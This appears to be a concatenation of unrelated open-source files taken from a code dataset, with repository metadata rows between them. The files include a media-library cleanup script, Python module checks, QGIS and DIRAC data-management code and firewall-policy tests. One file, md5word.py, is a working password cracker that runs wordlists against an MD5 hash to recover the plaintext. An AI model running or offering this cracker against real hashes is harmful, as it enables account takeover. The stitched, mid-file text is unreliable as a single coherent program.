attrs.append(('writable', '1'))
if field.bits:
attrs.append(('bits', str(field.bits)))
if field.private:
attrs.append(('private', '1'))
with self.tagcontext('field', attrs):
self._write_generic(field)
self._write_type(field.type)
def _write_signal(self, signal):
attrs = [('name', signal.name)]
self._append_version(signal, attrs)
self._append_node_generic(signal, attrs)
with self.tagcontext('glib:signal', attrs):
self._write_generic(signal)
self._write_return_type(signal.retval)
self._write_parameters(signal, signal.parameters)
| gpl-2.0 | 7,605,723,460,842,861,000 | 41.477718 | 99 | 0.565883 | false |
PlainStupid/PlainCleanUp | CleanUp/FinalSol.py | 1 | 9335 | import re
import os
import shutil
import sys
# Regexes are ordered from the most used to the least used pattern
# for a given file name.
regexShow = [
'''
# Matches with Show.S01E10.mp4
^ #Beginning of a string
(?P<ShowName>.+?) #Show name
[\.\_\-\s]+ #If it has dot, underscore or dash
(?:s\s*|season\s*) #Case if starts with s or season
(?P<SeasonNumber>\d+) #Show Season number
[. _-]*
(?:e\s*|episode\s*) #Case if starts with e or episode
(?P<EpisodeNumber>\d+) #Show episode number
[. _-]*
''',
'''
# Matches Show.Name -12x12.avi
^
(?P<ShowName>.+)
#Show name
[._-]+ # char between show name and season number
(?P<SeasonNumber>\d+)
#Season number
x #x between season and episode number
(?P<EpisodeNumber>\d+)
#Episode number
''',
'''
# Matches Show - [01x10].mp4
^
(?P<ShowName>.+)
\s*[-]*\s*\[
(?P<SeasonNumber>\d+) #Season number
x
(?P<EpisodeNumber>\d+)#Episode number
]
''',
'''
# Matches Show.Name.812.mp4
^
(?P<ShowName>.+?)
[. _-]+
(?P<SeasonNumber>\d{1,2}) #Season number
(?P<EpisodeNumber>\d{2}) #Episode number
''',
'''
# Matches with Show03e10.mp4
# eg. santi-dexterd07e10.hdrip.xvid
^(?P<ShowName>.{2,}) #Show name
(?P<SeasonNumber>\d.+) #Season number
(?:e|episode)(?P<EpisodeNumber>\d+) #Episode number
'''
]
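# Illustrative example of how the patterns above are used further down (the
# file name is an assumption): "Show.Name.S01E10.mp4" matches the first
# pattern with ShowName="Show.Name", SeasonNumber="01", EpisodeNumber="10",
# which cleanShowName()/mkFullShowDir() later turn into
# "<clean>/Shows/Show Name/Season 01/".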
ignoreRegex = {'sample': '(^|[\W_])(sample\d*)[\W_]',
'photos': '^AlbumArt.+{.+}'}
videoextensions = [ 'avi', 'mp4', 'mkv', 'mpg', 'mp3',
'm4v', 'divx', 'rm', 'mpeg', 'wmv',
'ogm', 'iso', 'img', 'm2ts', 'ts',
'flv', 'f4v', 'mov', 'rmvb', 'vob',
'dvr-ms', 'wtv', 'ogv', '3gp', 'xvid'
]
subExtensions = ['srt', 'idx', 'sub']
otherExtension = ['nfo']
photoExtensions = ['jpg', 'jpeg', 'bmp', 'tbn']
junkFiles = ['.torrent', '.dat', '.url', '.txt', '.sfv']
showsFolder = 'Shows'
def cleanUp(dirty_dir, clean_dir):
# Absolute path to the dirty directory
dirtyDir = os.path.abspath(dirty_dir)
# Absolute path to the clean directory
cleanDir = os.path.abspath(clean_dir)
theShowDir = os.path.join(cleanDir, showsFolder)
for subdir, dirs, files in os.walk(dirtyDir):
# Scan every file in dirtyDir
for file in files:
# Get the file name and its extension
file_name, file_extension = os.path.splitext(file)
# Absolute path to the old file
oldFile = os.path.abspath(os.path.join(subdir, file))
# Run through every regular expression, from best match to least match
for y in regexShow:
# First we compile the regular expression
showReg = re.compile(y, re.IGNORECASE | re.MULTILINE | re.VERBOSE)
# Get the show name if it exists
showName = showReg.match(file)
# We don't want sample files so we check if the current file is
# a sample file
isSample = re.search(ignoreRegex['sample'], file)
                # Check whether the file is an AlbumArt image, which is ignored later
ignPhotos = re.match(ignoreRegex['photos'], file)
# Check the shows files based on their extension and if they are not
# a sample file
if showName and not isSample and allowedExt(file_extension):
mkFullShowDir(theShowDir, showName)
moveTvFile(theShowDir, oldFile, showName)
break
# Check the photos since we don't want all photos, eg. AlbumArt_....
if showName and not isSample and not ignPhotos and file_extension[1:] in photoExtensions:
mkFullShowDir(theShowDir, showName)
moveTvFile(theShowDir, oldFile, showName)
break
# Remove the file if it has junk extension
if file_extension in junkFiles:
if os.path.exists(oldFile):
os.remove(oldFile)
# Go and clean the dirty folder, that is remove all empty folders
cleanEmptyDirtyDir(dirtyDir)
# Give the user a satisfying word
print('Done')
def cleanEmptyDirtyDir(dirtyDir):
# get number of subdirectories
curr = len([x[0] for x in os.walk(dirtyDir)])
while True:
# remove all empty dirs
remove_all_empty_dirs(dirtyDir)
temp = len([x[0] for x in os.walk(dirtyDir)])
# if no empty directory was found we stop
if curr == temp:
break
curr = temp
def allowedExt(file_extension):
"""
:argument File extension
:returns Returns true if the file extension is in current extensions groups
"""
# Get the file extension without the dot
fileExt = file_extension[1:]
# Return True if it exist in extensions groups
return (fileExt in subExtensions or
fileExt in videoextensions or
fileExt in otherExtension)
def cleanShowName(file):
"""
:argument Original file name(string)
:returns Returns clean show name, eg. Show Name
"""
return re.sub('\.|-|_', ' ', file.group('ShowName')).strip().title()
def dottedShowName(file):
"""
:argument Original file name(string)
:returns Returns dotted show name, eg. Show.Name
"""
return re.sub('-|_|\s', '.', file.group('ShowName')).strip().title()
def mkFullMovieDir(fullDir, newfile):
movieName = newfile.group('MovieName')
movieYear = newfile.group('MovieYear')
pathName = '%s (%s)' % (movieName, movieYear)
newPath = os.path.join(fullDir, pathName)
if not os.path.isdir(newPath):
if os.path.isfile(newPath):
raise OSError('A file with the same name as the folder already exist: %s' % (newPath))
else:
try:
os.makedirs(newPath)
pass
except:
raise OSError('Something went wrong creating the folders: %s' % (newPath))
pass
def moveTvFile(clean_dir, oldFile, newFile):
"""
:argument Path to the clean directory, old file including its path, regex file
:returns Silently returns if exist or has been created, else raise error
"""
# Get the clean show name - Show Name
showName = cleanShowName(newFile)
# And the season number
seasonNumber = int(newFile.group('SeasonNumber'))
# String with clean Show directory - ./clean/Show Name/
showDirectory = os.path.join(clean_dir,showName)
# Season string with leading zero - Season 03
formatedSeason = 'Season %02d' %(seasonNumber)
# Full path to the newly created clean path - ./clean/Show Name/Season ##/
fullDir = os.path.join(showDirectory,formatedSeason)
    # Get the base name of the old file - ./dirty/Season9/TheFileS##E##.avi -> TheFileS##E##.avi
oldFileName = os.path.basename(oldFile)
# New file path to the clean folder - ./clean/Show Name/Season ##/TheFile.avi
newFilePath = os.path.join(fullDir, oldFileName)
# If it doesn't exist we rename it, otherwise just notify user about it
if not os.path.isfile(newFilePath):
shutil.move(oldFile, newFilePath)
else:
        print('The old file already exists in the new path:', oldFile)
pass
def mkFullShowDir(clean_dir, file):
"""
:argument Original file name(string)
:returns Silently returns if exist or has been created, else raise error
"""
# Get the clean show name - Show Name
showName = cleanShowName(file)
# And the season number
seasonNumber = int(file.group('SeasonNumber'))
# String with clean Show directory - ./clean/Show Name/
showDirectory = os.path.join(clean_dir,showName)
# Season string with leading zero - Season 03
formatedSeason = 'Season %02d' %(seasonNumber)
# Full path to the newly created clean path - ./clean/Show Name/Season ##/
fullDir = os.path.join(showDirectory,formatedSeason)
# Create the folder if it doesn't exist, raise error if there is a file
# with the same name
if not os.path.isdir(fullDir):
if os.path.isfile(fullDir):
raise OSError('A file with the same name as the folder already exist: %s' % (fullDir))
else:
try:
os.makedirs(fullDir)
pass
except:
raise OSError('Something went wrong creating the folders: %s' % (fullDir))
pass
def remove_all_empty_dirs(path_to_curr_dir):
"""
:argument Path to dirty directory
:returns Nothing
"""
# check if path exists
if not os.path.isdir(path_to_curr_dir):
return
# get all items in the current directory
items = os.listdir(path_to_curr_dir)
# if directory is not empty, we call recursively for each item
if items:
for item in items:
abs_path = os.path.join(path_to_curr_dir, item)
remove_all_empty_dirs(abs_path)
# Empty folder removed
else:
os.rmdir(path_to_curr_dir)
if __name__ == "__main__":
cleanUp(sys.argv[1], sys.argv[2]) | mit | 6,587,270,393,259,099,000 | 30.12 | 105 | 0.582217 | false |
jjdmol/LOFAR | CEP/GSM/bremen/validate_install.py | 1 | 1521 | #!/usr/bin/python
"""
Script to check if the required modules are installed.
"""
class BColors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
def _test_import(libname):
"""
Try importing the library.
"""
try:
__import__(libname)
return True
except ImportError:
return False
def getOk(ok=True):
"""
Get the coloured "OK"/"FAILED" line.
"""
if ok:
return '%s OK %s' % (BColors.OKGREEN, BColors.ENDC)
else:
return '%s FAILED %s' % (BColors.FAIL, BColors.ENDC)
OK_STR = { True: 'OK', False: 'FAILED' }
def test_import(libname):
"""
Test if a module libname is available.
"""
print 'Module %s ... %s' % (libname, getOk(_test_import(libname)))
def test_import_alternative(lib1, lib2):
"""
Test if either of lib1/lib2 is available.
"""
b1 = _test_import(lib1)
b2 = _test_import(lib2)
print '%s %s / %s %s ... %s' % (lib1, OK_STR[b1], lib2, OK_STR[b2], getOk(b2 or b1))
def print_head(name):
"""
Print a fancy title.
"""
print BColors.HEADER, '='*10, name, '='*10, BColors.ENDC
print_head('CRITICAL')
test_import('pysvn')
test_import_alternative('monetdb', 'psycopg2')
test_import('numpy')
test_import('healpy')
test_import_alternative('configobj', 'lofar.parameterset')
print_head('API')
test_import('texttable')
print_head('Tests')
test_import('nose')
test_import('testconfig')
| gpl-3.0 | -5,944,344,756,564,354,000 | 19.28 | 88 | 0.593031 | false |
GillesArcas/numsed | numsed/common.py | 1 | 2941 | from __future__ import print_function
import sys
import os
import subprocess
import time
try:
from StringIO import StringIO # Python2
except ImportError:
from io import StringIO # Python3
PY2 = sys.version_info < (3,)
PY3 = sys.version_info > (3,)
TMP_SED = 'tmp.sed'
TMP_INPUT = 'tmp.input'
TMP_PY = 'tmp.py'
class NumsedConversion:
def __init__(self, source, transformation):
self.source = source
self.transformation = transformation
def trace(self):
return ''
def run(self, verbose=True):
return ''
def coverage(self):
return 'Coverage not implemented for current conversion.'
class ListStream:
def __enter__(self):
self.result = StringIO()
sys.stdout = self.result
return self
def __exit__(self, ext_type, exc_value, traceback):
sys.stdout = sys.__stdout__
def stringlist(self):
return self.result.getvalue().splitlines()
def singlestring(self):
return self.result.getvalue()
def run(cmd, echo=True):
try:
p = subprocess.Popen(cmd.split(),
#shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
except:
print('Unable to start', cmd)
exit(1)
res = []
while True:
line = p.stdout.readline()
line = line.decode('ascii') # py3
if line == '':
break
else:
line = line.rstrip('\n\r')
res.append(line)
if echo:
print(line)
return '\n'.join(res)
def testlines(name):
'''
yield each test in a test suite
'''
lines = []
result = None
dest = lines
with open(name) as f:
for line in f:
if line.startswith('#') and '===' in line:
result = []
dest = result
elif line.startswith('#') and '---' in line:
yield lines, result
lines = []
result = None
dest = lines
else:
dest.append(line)
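# Illustrative layout of a test-suite file consumed by testlines() above
# (the exact statements are assumptions, not taken from the repository):
#
#   print 2 + 2
#   # === expected output starts here
#   4
#   # --- end of this test case, the next one starts below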
def list_compare(tag1, tag2, list1, list2):
# make sure both lists have same length
maxlen = max(len(list1), len(list2))
list1.extend([''] * (maxlen - len(list1)))
list2.extend([''] * (maxlen - len(list2)))
# with open('list1.txt', 'w') as f:
# for line in list1:
# print>>f, line
# with open('list2.txt', 'w') as f:
# for line in list2:
# print>>f, line
diff = list()
res = True
for i, (x, y) in enumerate(zip(list1, list2)):
if x != y:
diff.append('line %s %d: %s' % (tag1, i + 1, x))
diff.append('line %s %d: %s' % (tag2, i + 1, y))
res = False
return res, diff
def hasextension(filename, *ext):
return os.path.splitext(filename)[1].lower() in [_.lower() for _ in ext]
| mit | 6,023,549,609,253,550,000 | 23.923729 | 76 | 0.524651 | false |
dstufft/warehouse | tests/unit/test_policy.py | 1 | 2168 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pretend
from warehouse import policy
def test_markdown_view(tmpdir):
tmpdir = str(tmpdir)
filename = "test.md"
with open(os.path.join(tmpdir, filename), "w", encoding="utf8") as fp:
fp.write("# This is my Test\n\nIt is a great test.\n")
view = policy.markdown_view_factory(filename=filename)
request = pretend.stub(registry=pretend.stub(settings={"policy.directory": tmpdir}))
result = view(request)
assert result == {
"title": "This is my Test",
"html": "<h1>This is my Test</h1>\n<p>It is a great test.</p>\n",
}
def test_add_policy_view(monkeypatch):
md_view = pretend.stub()
markdown_view_factory = pretend.call_recorder(lambda filename: md_view)
monkeypatch.setattr(policy, "markdown_view_factory", markdown_view_factory)
config = pretend.stub(
add_route=pretend.call_recorder(lambda *a, **kw: None),
add_view=pretend.call_recorder(lambda *a, **kw: None),
)
policy.add_policy_view(config, "my-policy", "mine.md")
assert config.add_route.calls == [
pretend.call("policy.my-policy", "/policy/my-policy/")
]
assert config.add_view.calls == [
pretend.call(md_view, route_name="policy.my-policy", renderer="policy.html")
]
assert markdown_view_factory.calls == [pretend.call(filename="mine.md")]
def test_includeme():
config = pretend.stub(add_directive=pretend.call_recorder(lambda *a, **kw: None))
policy.includeme(config)
assert config.add_directive.calls == [
pretend.call("add_policy", policy.add_policy_view, action_wrap=False)
]
| apache-2.0 | -2,289,942,341,886,902,800 | 31.358209 | 88 | 0.683118 | false |
knightmare2600/d4rkc0de | encryption/md5word.py | 1 | 1132 | #!/usr/bin/python
#Uses all wordlists in a dir to crack a hash.
#
#www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import md5, sys, os, time
def getwords(wordlist):
try:
file = open(wordlist, "r")
words = file.readlines()
file.close()
except(IOError),msg:
words = ""
print "Error:",msg
pass
return words
def timer():
now = time.localtime(time.time())
return time.asctime(now)
if len(sys.argv) != 3:
print "Usage: ./md5word.py <hash> <wordlist dir>"
sys.exit(1)
pw = sys.argv[1]
wordlists = os.listdir(sys.argv[2])
print "\n d3hydr8[at]gmail[dot]com md5word v1.0"
print "-----------------------------------------"
print "\n[+] Hash:",pw
print "[+] Wordlists Loaded:",len(wordlists)
print "[+] Started:",timer(),"\n"
for lst in wordlists:
words = getwords(os.path.join(sys.argv[2],lst))
print "[+] List:",lst," Length:",len(words),"loaded"
for word in words:
hash = md5.new(word[:-1]).hexdigest()
if pw == hash:
print "\n[+] Found Password:",os.path.join(sys.argv[2],lst)
print "[!] Password is:",word
print "\n[+] Done:",timer()
sys.exit(1)
print "\n[+] Done:",timer()
| gpl-2.0 | 3,432,820,828,723,467,000 | 19.581818 | 62 | 0.605124 | false |
google/capirca | tests/lib/windows_test.py | 1 | 4977 | # Copyright 2008 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unittest for windows acl rendering module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
from capirca.lib import naming
from capirca.lib import policy
from capirca.lib import windows
import mock
GOOD_HEADER = """
header {
comment:: "this is a test acl"
target:: windows test-filter
}
"""
MULTIPLE_PROTOCOLS_TERM = """
term multi-proto {
protocol:: tcp udp icmp
action:: accept
}
"""
GOOD_WARNING_TERM = """
term good-warning-term {
protocol:: tcp udp icmp
policer:: batman
action:: accept
}
"""
GOOD_TERM = """
term good-term {
source-port:: FOO
destination-port:: BAR
protocol:: tcp
action:: accept
}
"""
TCP_ESTABLISHED_TERM = """
term tcp-established {
source-port:: FOO
destination-port:: BAR
protocol:: tcp
option:: tcp-established
action:: accept
}
"""
UDP_ESTABLISHED_TERM = """
term udp-established-term {
source-port:: FOO
destination-port:: BAR
protocol:: udp
option:: established
action:: accept
}
"""
SUPPORTED_TOKENS = {
'action',
'comment',
'destination_address',
'destination_address_exclude',
'destination_port',
'expiration',
'icmp_type',
'stateless_reply',
'name',
'option',
'platform',
'platform_exclude',
'protocol',
'source_address',
'source_address_exclude',
'source_port',
'translated',
}
SUPPORTED_SUB_TOKENS = {
'action': {'accept', 'deny'},
'icmp_type': {
'alternate-address',
'certification-path-advertisement',
'certification-path-solicitation',
'conversion-error',
'destination-unreachable',
'echo-reply',
'echo-request', 'mobile-redirect',
'home-agent-address-discovery-reply',
'home-agent-address-discovery-request',
'icmp-node-information-query',
'icmp-node-information-response',
'information-request',
'inverse-neighbor-discovery-advertisement',
'inverse-neighbor-discovery-solicitation',
'mask-reply',
'mask-request', 'information-reply',
'mobile-prefix-advertisement',
'mobile-prefix-solicitation',
'multicast-listener-done',
'multicast-listener-query',
'multicast-listener-report',
'multicast-router-advertisement',
'multicast-router-solicitation',
'multicast-router-termination',
'neighbor-advertisement',
'neighbor-solicit',
'packet-too-big',
'parameter-problem',
'redirect',
'redirect-message',
'router-advertisement',
'router-renumbering',
'router-solicit',
'router-solicitation',
'source-quench',
'time-exceeded',
'timestamp-reply',
'timestamp-request',
'unreachable',
'version-2-multicast-listener-report',
},
}
# Print an info message when a term is set to expire in that many weeks.
# This is normally passed from command line.
EXP_INFO = 2
class WindowsGeneratorTest(unittest.TestCase):
def setUp(self):
super(WindowsGeneratorTest, self).setUp()
self.naming = mock.create_autospec(naming.Naming)
def testBuildTokens(self):
pol1 = windows.WindowsGenerator(
policy.ParsePolicy(GOOD_HEADER + MULTIPLE_PROTOCOLS_TERM, self.naming),
EXP_INFO)
st, sst = pol1._BuildTokens()
self.assertEqual(st, SUPPORTED_TOKENS)
self.assertEqual(sst, SUPPORTED_SUB_TOKENS)
def testBuildWarningTokens(self):
pol1 = windows.WindowsGenerator(policy.ParsePolicy(
GOOD_HEADER + GOOD_WARNING_TERM, self.naming), EXP_INFO)
st, sst = pol1._BuildTokens()
self.assertEqual(st, SUPPORTED_TOKENS)
self.assertEqual(sst, SUPPORTED_SUB_TOKENS)
def testSkipEstablished(self):
# self.naming.GetNetAddr.return_value = _IPSET
self.naming.GetServiceByProto.return_value = ['123']
pol = windows.WindowsGenerator(policy.ParsePolicy(
GOOD_HEADER + TCP_ESTABLISHED_TERM + GOOD_TERM, self.naming), EXP_INFO)
self.assertEqual(len(pol.windows_policies[0][4]), 1)
pol = windows.WindowsGenerator(policy.ParsePolicy(
GOOD_HEADER + UDP_ESTABLISHED_TERM + GOOD_TERM, self.naming), EXP_INFO)
self.assertEqual(len(pol.windows_policies[0][4]), 1)
if __name__ == '__main__':
unittest.main()
| apache-2.0 | -2,680,503,843,350,668,000 | 25.902703 | 79 | 0.666064 | false |
gioman/QGIS | python/plugins/processing/algs/qgis/SinglePartsToMultiparts.py | 1 | 4039 | # -*- coding: utf-8 -*-
"""
***************************************************************************
SinglePartsToMultiparts.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from builtins import str
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from qgis.PyQt.QtGui import QIcon
from qgis.core import QgsFeature, QgsGeometry, QgsWkbTypes, QgsProcessingUtils, NULL
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.parameters import ParameterVector
from processing.core.parameters import ParameterTableField
from processing.core.outputs import OutputVector
pluginPath = os.path.split(os.path.split(os.path.dirname(__file__))[0])[0]
class SinglePartsToMultiparts(GeoAlgorithm):
INPUT = 'INPUT'
FIELD = 'FIELD'
OUTPUT = 'OUTPUT'
def icon(self):
return QIcon(os.path.join(pluginPath, 'images', 'ftools', 'single_to_multi.png'))
def group(self):
return self.tr('Vector geometry tools')
def name(self):
return 'singlepartstomultipart'
def displayName(self):
return self.tr('Singleparts to multipart')
def defineCharacteristics(self):
self.addParameter(ParameterVector(self.INPUT, self.tr('Input layer')))
self.addParameter(ParameterTableField(self.FIELD,
self.tr('Unique ID field'), self.INPUT))
self.addOutput(OutputVector(self.OUTPUT, self.tr('Multipart')))
def processAlgorithm(self, context, feedback):
layer = QgsProcessingUtils.mapLayerFromString(self.getParameterValue(self.INPUT), context)
fieldName = self.getParameterValue(self.FIELD)
geomType = QgsWkbTypes.multiType(layer.wkbType())
writer = self.getOutputFromName(self.OUTPUT).getVectorWriter(layer.fields(), geomType, layer.crs(),
context)
outFeat = QgsFeature()
inGeom = QgsGeometry()
index = layer.fields().lookupField(fieldName)
collection_geom = {}
collection_attrs = {}
features = QgsProcessingUtils.getFeatures(layer, context)
total = 100.0 / QgsProcessingUtils.featureCount(layer, context)
for current, feature in enumerate(features):
atMap = feature.attributes()
idVar = atMap[index]
if idVar in [None, NULL]:
outFeat.setAttributes(atMap)
outFeat.setGeometry(feature.geometry())
writer.addFeature(outFeat)
feedback.setProgress(int(current * total))
continue
key = str(idVar).strip()
if key not in collection_geom:
collection_geom[key] = []
collection_attrs[key] = atMap
inGeom = feature.geometry()
collection_geom[key].append(inGeom)
feedback.setProgress(int(current * total))
for key, geoms in collection_geom.items():
outFeat.setAttributes(collection_attrs[key])
outFeat.setGeometry(QgsGeometry.collectGeometry(geoms))
writer.addFeature(outFeat)
del writer
| gpl-2.0 | 3,639,953,806,379,038,000 | 35.0625 | 107 | 0.564001 | false |
arrabito/DIRAC | DataManagementSystem/Agent/RequestOperations/ReplicateAndRegister.py | 1 | 28823 | ########################################################################
# File: ReplicateAndRegister.py
# Author: [email protected]
# Date: 2013/03/13 18:49:12
########################################################################
""" :mod: ReplicateAndRegister
==========================
.. module: ReplicateAndRegister
:synopsis: ReplicateAndRegister operation handler
.. moduleauthor:: [email protected]
ReplicateAndRegister operation handler
"""
__RCSID__ = "$Id$"
# #
# @file ReplicateAndRegister.py
# @author [email protected]
# @date 2013/03/13 18:49:28
# @brief Definition of ReplicateAndRegister class.
# # imports
import re
from collections import defaultdict
# # from DIRAC
from DIRAC import S_OK, S_ERROR, gLogger
from DIRAC.Core.Utilities.Adler import compareAdler, hexAdlerToInt, intAdlerToHex
from DIRAC.FrameworkSystem.Client.MonitoringClient import gMonitor
from DIRAC.DataManagementSystem.Client.DataManager import DataManager
from DIRAC.DataManagementSystem.Agent.RequestOperations.DMSRequestOperationsBase import DMSRequestOperationsBase
from DIRAC.Resources.Storage.StorageElement import StorageElement
from DIRAC.Resources.Catalog.FileCatalog import FileCatalog
from DIRAC.DataManagementSystem.Client.FTS3Operation import FTS3TransferOperation
from DIRAC.DataManagementSystem.Client.FTS3File import FTS3File
from DIRAC.DataManagementSystem.Client.FTS3Client import FTS3Client
from DIRAC.ConfigurationSystem.Client.Helpers import Registry
from DIRAC.DataManagementSystem.Client.FTSClient import FTSClient
def filterReplicas(opFile, logger=None, dataManager=None):
""" filter out banned/invalid source SEs """
if logger is None:
logger = gLogger
if dataManager is None:
dataManager = DataManager()
log = logger.getSubLogger("filterReplicas")
result = defaultdict(list)
replicas = dataManager.getActiveReplicas(opFile.LFN, getUrl=False)
if not replicas["OK"]:
log.error('Failed to get active replicas', replicas["Message"])
return replicas
reNotExists = re.compile(r".*such file.*")
replicas = replicas["Value"]
failed = replicas["Failed"].get(opFile.LFN, "")
if reNotExists.match(failed.lower()):
opFile.Status = "Failed"
opFile.Error = failed
return S_ERROR(failed)
replicas = replicas["Successful"].get(opFile.LFN, {})
noReplicas = False
if not replicas:
allReplicas = dataManager.getReplicas(opFile.LFN, getUrl=False)
if allReplicas['OK']:
allReplicas = allReplicas['Value']['Successful'].get(opFile.LFN, {})
if not allReplicas:
result['NoReplicas'].append(None)
noReplicas = True
else:
# There are replicas but we cannot get metadata because the replica is not active
result['NoActiveReplicas'] += list(allReplicas)
log.verbose("File has no%s replica in File Catalog" % ('' if noReplicas else ' active'), opFile.LFN)
else:
return allReplicas
if not opFile.Checksum or hexAdlerToInt(opFile.Checksum) is False:
# Set Checksum to FC checksum if not set in the request
fcMetadata = FileCatalog().getFileMetadata(opFile.LFN)
    fcChecksum = fcMetadata.get('Value', {}).get(
        'Successful', {}).get(opFile.LFN, {}).get('Checksum')
# Replace opFile.Checksum if it doesn't match a valid FC checksum
if fcChecksum:
if hexAdlerToInt(fcChecksum) is not False:
opFile.Checksum = fcChecksum
opFile.ChecksumType = fcMetadata['Value']['Successful'][opFile.LFN].get('ChecksumType', 'Adler32')
else:
opFile.Checksum = None
# If no replica was found, return what we collected as information
if not replicas:
return S_OK(result)
for repSEName in replicas:
repSEMetadata = StorageElement(repSEName).getFileMetadata(opFile.LFN)
error = repSEMetadata.get('Message', repSEMetadata.get('Value', {}).get('Failed', {}).get(opFile.LFN))
if error:
log.warn('unable to get metadata at %s for %s' % (repSEName, opFile.LFN), error.replace('\n', ''))
if 'File does not exist' in error:
result['NoReplicas'].append(repSEName)
else:
result["NoMetadata"].append(repSEName)
elif not noReplicas:
repSEMetadata = repSEMetadata['Value']['Successful'][opFile.LFN]
seChecksum = hexAdlerToInt(repSEMetadata.get("Checksum"))
# As from here seChecksum is an integer or False, not a hex string!
if seChecksum is False and opFile.Checksum:
result['NoMetadata'].append(repSEName)
elif not seChecksum and opFile.Checksum:
opFile.Checksum = None
opFile.ChecksumType = None
elif seChecksum and (not opFile.Checksum or opFile.Checksum == 'False'):
# Use the SE checksum (convert to hex) and force type to be Adler32
opFile.Checksum = intAdlerToHex(seChecksum)
opFile.ChecksumType = 'Adler32'
if not opFile.Checksum or not seChecksum or compareAdler(
intAdlerToHex(seChecksum), opFile.Checksum):
# # All checksums are OK
result["Valid"].append(repSEName)
else:
log.warn(" %s checksum mismatch, FC: '%s' @%s: '%s'" %
(opFile.LFN, opFile.Checksum, repSEName, intAdlerToHex(seChecksum)))
result["Bad"].append(repSEName)
else:
# If a replica was found somewhere, don't set the file as no replicas
result['NoReplicas'] = []
return S_OK(result)
########################################################################
class ReplicateAndRegister(DMSRequestOperationsBase):
"""
.. class:: ReplicateAndRegister
ReplicateAndRegister operation handler
"""
def __init__(self, operation=None, csPath=None):
"""c'tor
:param self: self reference
:param Operation operation: Operation instance
:param str csPath: CS path for this handler
"""
super(ReplicateAndRegister, self).__init__(operation, csPath)
# # own gMonitor stuff for files
gMonitor.registerActivity("ReplicateAndRegisterAtt", "Replicate and register attempted",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("ReplicateOK", "Replications successful",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("ReplicateFail", "Replications failed",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("RegisterOK", "Registrations successful",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("RegisterFail", "Registrations failed",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
# # for FTS
gMonitor.registerActivity("FTSScheduleAtt", "Files schedule attempted",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("FTSScheduleOK", "File schedule successful",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
gMonitor.registerActivity("FTSScheduleFail", "File schedule failed",
"RequestExecutingAgent", "Files/min", gMonitor.OP_SUM)
# # SE cache
# Clients
self.fc = FileCatalog()
def __call__(self):
""" call me maybe """
# # check replicas first
checkReplicas = self.__checkReplicas()
if not checkReplicas["OK"]:
self.log.error('Failed to check replicas', checkReplicas["Message"])
if hasattr(self, "FTSMode") and getattr(self, "FTSMode"):
bannedGroups = getattr(self, "FTSBannedGroups") if hasattr(self, "FTSBannedGroups") else ()
if self.request.OwnerGroup in bannedGroups:
self.log.verbose("usage of FTS system is banned for request's owner")
return self.dmTransfer()
if getattr(self, 'UseNewFTS3', False):
return self.fts3Transfer()
else:
return self.ftsTransfer()
return self.dmTransfer()
def __checkReplicas(self):
""" check done replicas and update file states """
waitingFiles = dict([(opFile.LFN, opFile) for opFile in self.operation
if opFile.Status in ("Waiting", "Scheduled")])
targetSESet = set(self.operation.targetSEList)
replicas = self.fc.getReplicas(waitingFiles.keys())
if not replicas["OK"]:
self.log.error('Failed to get replicas', replicas["Message"])
return replicas
reMissing = re.compile(r".*such file.*")
for failedLFN, errStr in replicas["Value"]["Failed"].iteritems():
waitingFiles[failedLFN].Error = errStr
if reMissing.search(errStr.lower()):
self.log.error("File does not exists", failedLFN)
gMonitor.addMark("ReplicateFail", len(targetSESet))
waitingFiles[failedLFN].Status = "Failed"
for successfulLFN, reps in replicas["Value"]["Successful"].iteritems():
if targetSESet.issubset(set(reps)):
self.log.info("file %s has been replicated to all targets" % successfulLFN)
waitingFiles[successfulLFN].Status = "Done"
return S_OK()
def _addMetadataToFiles(self, toSchedule):
""" Add metadata to those files that need to be scheduled through FTS
toSchedule is a dictionary:
{'lfn1': opFile, 'lfn2': opFile}
"""
if toSchedule:
self.log.info("found %s files to schedule, getting metadata from FC" % len(toSchedule))
else:
self.log.verbose("No files to schedule")
return S_OK([])
res = self.fc.getFileMetadata(toSchedule.keys())
if not res['OK']:
return res
else:
if res['Value']['Failed']:
self.log.warn("Can't schedule %d files: problems getting the metadata: %s" %
(len(res['Value']['Failed']), ', '.join(res['Value']['Failed'])))
metadata = res['Value']['Successful']
filesToSchedule = {}
for lfn, lfnMetadata in metadata.iteritems():
